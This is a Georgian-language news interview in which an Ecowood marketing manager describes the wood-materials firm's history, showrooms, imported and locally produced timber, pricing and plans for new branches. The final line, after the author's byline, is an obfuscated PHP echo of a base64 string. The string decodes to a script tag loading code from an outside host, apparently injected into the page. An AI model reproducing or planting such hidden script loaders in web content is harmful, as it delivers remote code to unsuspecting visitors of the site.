celsiusi
ავერსი საქკაბელი

გაზაფხულის დადგომასთან ერთად სამშენებლო სარემონტო სამუშაოები მატულობს და მოთხოვნა ამ სახის სამუშაოებისთვის საჭირო მასალაზე უფრო მეტად იზრდება.

საინფორმაციო სააგენტო „ბიზნესთაიმი“ კომპანია „ეკოვუდის“კორპორაციული გაყიდვებისა და მარკეტინგის ხელმძღვანელს გიორგი სრესელს მიმდინარე შეთავაზებებზე და სიახლეებზე ესაუბრა.

გიორგი, მოგვიყევით რა პოზიციები უკავია კომპანიას და როგორ მიაღწია „ეკოვუდმა“ ბაზარზე დღეს არსებულ პოზიციებს?

„ეკოვუდი“ ბაზარზე 2015 წლიდან გამოჩნდა. კომპანიის სურვილი და მიზანი იყო შეგვექმნა ისეთი სივრცე, სადაც ბუნებრივი და ეკოლოგიურად სუფთა ხის მასალა მოიყრიდა თავს. ვფიქრობთ, რომ დიდწილად მიზანი მიღწეულია. ჩვენ შოურუმში (თბილისი, წყალსადენის ქუჩაზე #21) ხის მასალის ფართო ასორტიმენტი გვაქვს წარმოდგენილი, რომლითაც შესაძლებელია სახლისა და ოფისის ეკო სივრცედ გადაქცევა. 2023 წელს დიდუბეში „ეკოვუდ ექსპრესის“ საპილოტე ვერსია შევქმენით და იქ ყველაზე მოთხოვნად და პოპულარულ პროდუქტებს მოვუყარეთ თავი. დღეს უკვე ეკოვუდი 300-ზე მეტი სახეობის ხის პროდუქტს სთავაზობს მომხმარებელს. წლის ბოლომდე თბილისში მეორე ფილიალის გახსნას ვგეგმავთ, რადგან პირველმა მოლოდინები ზედმიწევნით გაამართლა და გვაჩვენა, რომ მოთხოვნა მზარდია და გაფართოება, მეორე ფილიალის გახსნა კარგ შედეგზე გაგვიყვანს. ასევე მნიშვნელოვანია, რომ სამშენებლო ჰიპერმარკეტებიდანაც აქტიური მოთხოვნაა. ჩვენი პროდუქცია წარმოდგენილია მთელი რეგიონის მასშტაბით (გორგია, ნოვა, დომინო, მიჰაუსი).

eko7895

ხარისხი მთავარია

საიდან ხდება პროდუქციის იმპორტი და რა ტიპის მასალებს სთავაზობთ მომხმარებელს?

რა თქმა უნდა, ხარისხი მთავარია! ჩვენი მთავარი უპირატესობაა, ეკოლოგიურად სუფთა პროდუქცია. გარდა ამისა, მრავალფეროვანი ასორტიმენტი და გაყიდვის შემდგომი კონსულტაციები, ის სერვისი რასაც ჩვენ ვთავაზობთ მომხმარებელს, აძლევს იმის გარანტიას, რომ გადახდილ თანხას და ინვესტიციას საფრთხე არ ემუქრება და სწორი გადაწყვეტილება მიიღო „ეკოვუდზე“ არჩევანის გაკეთებით.

რაც შეეხება იმას თუ საიდან შემოგვაქვს პროდუქცია, ჩვენთან წარმოდგენილია ხის მასალა აფრიკიდან, მალაიზიიდან, ინდონეზიიდან, კანადიდან, აშშ-დან, ციმბირის რეგიონიდან. გვაქვს ასევე ხის მასალის დაცვითი საშუალებები აშშ-დან, პოლონეთიდან, უკრაინიდან და ა.შ.

როგორ დაახასიათებდით ქართველ მომხმარებელს და რა ტიპის მომხმარებელი ირჩევს „ეკოვუდს“?

ვთვლი, რიმ ქართველი მომხმარებელი ძირითადად ხარისხზე ორიენტირებულია. „ეკოვუდის“ მომხმარებლებმა ხშირ შემთხვევაში ზუსტად იციან რა სურთ, უნდა აღვნიშნო, რომ ბუნებრივი ხის მასალის მოთხოვნა დღითიდღე იზრდება, რაც ძალიან სასიხარულოა, ყველა ცდილობს, რომ საცხოვრებელ სახლში თუ ოფისში, ეკო სივრცე შექმნას.

ასევე მზარდია მოთხოვნა როგორც ხის სახლებზე, კოტეჯების მშენებლობის კუთხით, ასევე საჭირო საკონსტრუქციო მასალებზე, სამზარეულოს, საავეჯე მოსაწყობ სარემონტო მასალებზე და სხვა პროდუქტებზე.

eko84

როგორ შეაფასებდით კონკურენციას ქართულ ბაზარზე და რა განგასხვავებთ კონკურენტებისგან?

ჩვენი მთავარი უპირატესობა მაღალი ხარისხის, ეკოლოგიურად სუფთა ხის მასალის ფართო ასორტიმენტია. მნიშვნელოვანია, რომ მომხმარებელს აღარ უწევს პროდუქტის კორექტირება, სხვაგან წაღება ზომების ასაღებად და დასაჭრელად, მათ სხვადასხვა ზომის, სისქის, გაბარიტების მზა პროდუქტს ვთავაზობთ, რომელსაც მხოლოდ მონტაჟი სჭირდება. ამას გარდა, მომხმარებლებისთვის გაყიდვის შემდგომი კონსულტაცია და სერვისი გვაქვს, რაც მათთვის ძალიან კომფორტულია და ხშირად აკეთებენ აღნიშნულზე აქცენტს. მოგეხსენებათ, ხის მასალას 4-5 წელიწადში ერთხელ განახლება და მოვლა სჭირდება და „ეკოვუდს“ სწორედ ზემოთ ჩამოთვლილი პრიორიტეტების გამო წლების მანძილზე უფრო მეტი ერთგული მომხმარებელი ემატება.

ასევე კომპანიის „ძლიერი მხარეა“ ჩვენი საწარმო ნატახტარში, რითაც იმპორტზე დამოკიდებულება შევამცირეთ. ხის გადამამუშავებელ საწარმოში ხორციელდება სხვადასხვა ხის პროდუქციის წარმოება. აღნიშნული საწარმო დაფინანსებულია და მხარდაჭერილია USAID-ის და პროგრამის - „აწარმოე საქართველოში“ მიერ. დიდი მადლობა მათ ქართული წარმოების მხარდაჭერისთვის.

eko12345

ფასი მნიშვნელოვანია

როგორია თქვენი საფასო პოლიტიკა?

„ეკოვუდში“ ძალიან ხელმისაწვდომი ფასები გვაქვს. იქიდან გამომდინარე, რომ ხის მასალას თავისი სეგმენტაცია-სორტირება აქვს, ფასზე სწორედ ეს ახდენს გავლენას. მაგალითად - კედლის და ჭერის პანელები, რაც მზა პროდუქტია, 16-19 ლარი ღირს კვადრატული; კოტეჯის შემთხვევაში საკონსტრუქციო და მოსაპირკეთებელი მასალები გვაქვს. მაგალითად: „ლარიქსის“ იატაკის ფასი, რომლითაც ლამინატს ანაცვლებენ - კვადრატულზე 45 ლარიდან იწყება. ეს საკმაოდ კარგი და ლამაზი ფაქტურის მასალაა და თითქმის საშვილიშვილოდ ძლებს; ასევე დიდი მოთხოვნაა სამზარეულოს ზედაპირებზე. მისი ფასები 350-დან 500 ლარის ფარგლებში მერყეობს და საკმაოდ დიდი ფორმატისაა - 60სმ/3 მ-ზე. გვაქვს როგორც წიწვოვანი ნაძვისა და ფიჭვის, ასევე ტროპიკული ხის და ასევე ფოთლოვანი ხის სახეობის. სეზონს კარგი შეთავაზებებით და ლოიალური ფასებით ვხვდებით. გვინდა, რომ მომხმარებელმა, დიზაინერებმა და არქიტექტორებმა იოლად მიიღონ ხის მიმართ აქტიური გადაწყვეტილებები.

300427015 3177617305887455 2416060188013007680 n

სიახლეების მოლოდინში

რას გვეტყვით სამომავლო გეგმებზე, რა სიახლეებს უნდა ელოდოს მომხმარებელი?

გეგმებს რაც შეეხება ვცდილობთ, რომ ასორტიმენტი და წარმადობა კიდევ უფრო გავზარდოთ და ნებისმიერი სეგმენტის მომხმარებლის სურვილი და გემოვნება დავაკმაყოფილოთ, შევთავაზოთ როგორც ბიუჯეტური, ასევე საშუალო და პრემიუმ სეგმენტზე გათვლილი ძვირად ღირებული ხის მასალა.

300-ზე მეტი სახეობის ხის პროდუქტი გვაქვს. თუ მომხმარებელს სურვილი აქვს, თავისუფლად შეძლებს თავისი სასურველი ხის მასალის არჩევას. როგორც უკვე აღვნიშნე, წელს „ეკოვუდ ექსპრესის“ კიდევ ერთ ფილიალს დავამატებთ, რადგან მოთხოვნა მზარდია, ინტერესი მაღალია, არქიტექტორები და დიზაინერები ცდილობენ, რომ ხის ჩართულობა როგორც შიდა სივრცეებში, ისე გარე გამოყენების კუთხითაც აქტიური იყოს, რაც მისასალმებელია.

ავტორი
მირანდა შურღაია
574
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");